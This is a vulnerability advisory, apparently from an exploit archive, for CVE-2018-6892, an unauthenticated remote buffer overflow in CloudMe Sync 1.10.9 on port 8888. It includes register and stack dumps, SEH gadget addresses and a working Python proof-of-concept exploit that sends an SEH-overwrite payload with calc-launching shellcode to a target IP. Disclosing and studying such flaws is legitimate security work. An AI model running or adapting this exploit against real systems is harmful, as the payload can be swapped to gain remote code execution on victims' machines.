Twenty Year Anniversary

CloudMe Sync 1.10.9 Remote Buffer Overflow

CloudMe Sync 1.10.9 Remote Buffer Overflow
Posted Feb 12, 2018
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

CloudMe Sync versions 1.10.9 and below suffer from an unauthenticated remote buffer overflow vulnerability.

tags | exploit, remote, overflow
advisories | CVE-2018-6892
MD5 | e6cc573f3f01ea0671021866a42d3b05

CloudMe Sync 1.10.9 Remote Buffer Overflow

Change Mirror Download
[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt
[+] ISR: Apparition Security
[+] SSD Beyond Security Submission: https://blogs.securiteam.com/index.php/archives/3669


Vendor:
=============
www.cloudme.com


Product:
===========
CloudMe Sync <= v1.10.9

(CloudMe_1109.exe)
hash: 0e83351dbf86562a70d1999df7674aa0

CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software.
It features a blue folder that appears on all devices with the same content, all files are synchronized between devices.



Vulnerability Type:
===================
Buffer Overflow



CVE Reference:
==============
CVE-2018-6892



Security Issue:
================
Unauthenticated remote attackers that can connect to the "CloudMe Sync" client application listening on port 8888, can send a malicious payload causing
a Buffer Overflow condition. This will result in an attacker controlling the programs execution flow and allowing arbitrary code execution on the victims PC.

CloudMe Sync client creates a socket listening on TCP Port 8888 (0x22B8)

In Qt5Core:

00564DF1 . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8
00564DF9 . 890424 MOV DWORD PTR SS:[ESP],EAX
00564DFC . FF15 B8738100 CALL DWORD PTR DS:[<&Qt5Network._ZN10QTc>; Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst


C:\>netstat -ano | findstr 8888
TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 15504
TCP [::]:8888 [::]:0 LISTENING 15504


Buffer Overflow:
================
EIP register will be overwritten at about 1075 bytes.

EAX 00000001
ECX 76F698DA msvcrt.76F698DA
EDX 00350000
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141

Stack Dump:
==========

(508.524): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
eax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000 edi=00000000
eip=41414141 esp=00091474 ebp=00091494 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???

Exploitation is very easy as ASLR SafeSEH are all set to false making the exploit portable and able to work across different operating systems.
We will therefore use Structured Exceptional Handler overwrite for our exploit.

e.g.

6FE6909D 0x6fe6909d : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll)
00476795 0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe)
61E7B7F6 0x61e7b7f6 : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll)


0day Exploit POC:
==============
import socket,struct

print 'CloudMe Sync v1.10.9'
print 'Unauthenticated Remote Buffer Overflow 0day'
print 'Discovery/credits: hyp3rlinx'
print 'apparition security\n'


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


ip=raw_input('[+] CloudMe Target IP> ')

nseh="\xEB\x06"+"\x90"*2 #JMP
seh=struct.pack('<L',0x61e7b7f6) #POP,POP RET
junk="A"*2232+nseh+seh+sc+"B"*5600
payload=junk+nseh+seh+sc

def PwnMe(ip,payload):
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,8888))
s.send(payload)
print 'Sending buffer overflow packetz'
raw_input()


if __name__ == '__main__':
PwnMe(ip,payload)



References:
============
https://www.cloudme.com/en/sync#
https://blogs.securiteam.com/index.php/archives/3669


POC Video URL:
=============
https://vimeo.com/255280060



Network Access:
===============
Remote



Severity:
=========
High



Disclosure Timeline:
=============================
SSD Vulnerability submission: January 17, 2018
Would like to acknowledge Beyond Security’s SSD program for the help with co-ordination of this vulnerability.
More details can be found on their blog at:

https://blogs.securiteam.com/index.php/archives/3669
February 11, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    45 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close